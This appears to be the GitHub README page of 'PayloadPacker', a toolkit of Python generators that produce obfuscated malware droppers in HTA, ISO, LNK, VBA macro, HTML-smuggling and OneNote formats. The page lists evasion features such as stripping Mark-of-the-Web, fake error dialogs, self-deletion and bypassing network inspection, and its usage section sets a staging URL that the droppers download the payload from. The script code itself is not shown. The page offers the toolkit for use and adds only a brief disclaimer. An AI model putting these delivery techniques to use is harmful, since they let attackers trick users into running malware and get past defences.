Skip to content

eren717/PayloadPacker

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pack_hta.py
pack_hta.py
 
 
pack_iso.py
pack_iso.py
 
 
pack_lnk.py
pack_lnk.py
 
 
pack_macro.py
pack_macro.py
 
 
pack_one.py
pack_one.py
 
 
pack_smuggle.py
pack_smuggle.py
 
 

Repository files navigation

PayloadPacker

Collection of Python generators for common initial access delivery formats. Each script produces a ready-to-use dropper with randomized variable names, string obfuscation, and configurable payload URLs.

What's Included

  • pack_hta.py - HTA dropper that runs via mshta.exe. Downloads payload using XMLHTTP, strips MOTW, shows a fake error dialog, then self-deletes.
  • pack_iso.py - ISO image containing a disguised LNK shortcut + hidden batch launcher + payload. Bypasses MOTW since mounted ISO files don't inherit Zone.Identifier.
  • pack_lnk.py - Weaponized .lnk shortcut with document icon. Uses cmd.exe + curl to download, no PowerShell involved. All metadata zeroed.
  • pack_macro.py - VBA macro stager for .docm/.xlsm. Downloads via WinHTTP, executes through WMI (no cmd.exe in process tree). Variable names and URL strings randomized per generation.
  • pack_smuggle.py - HTML smuggling page with OneDrive/SharePoint/Google Drive/Dropbox themes. Assembles payload client-side via JS blob, bypassing network inspection.
  • pack_one.py - OneNote (.one) file with embedded batch stager. Builds a minimal valid MS-ONE binary.

Setup

pip install pycdlib   # only needed for pack_iso.py

Usage

Set your staging URL via environment variable, then run any generator:

export PAYLOAD_URL="https://your-staging-server.com/payload.exe"

python pack_hta.py
python pack_iso.py
python pack_lnk.py
python pack_macro.py
python pack_smuggle.py
python pack_one.py

Output goes to the output/ folder. Each run randomizes variable names and string encodings, so no two outputs are identical.

Configuration

All scripts read PAYLOAD_URL from environment. You can also edit the constants at the top of each file directly:

  • PAYLOAD_URL - where the payload gets downloaded from
  • PAYLOAD_NAME - filename written to disk on the target
  • OUTPUT_DIR / OUTPUT_FILE - where the generated file lands

Some scripts have extra options:

  • pack_smuggle.py: set THEME to onedrive, sharepoint, google_drive, or dropbox
  • pack_smuggle.py: set EMBED_FILE to bake a binary directly into the HTML
  • pack_one.py: set MODE to batch or hta

License

MIT

Disclaimer

For educational and authorized security research only. I am not responsible for any misuse.

Contact

questions or need help? discord: eren_._z

About

Modular payload delivery format generators (HTA, ISO, LNK, VBA macro, HTML smuggling, OneNote)

Topics

python windows iso hta macro payload lnk onenote red-team delivery security-tools vba-macro html-smuggling payload-delivery

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages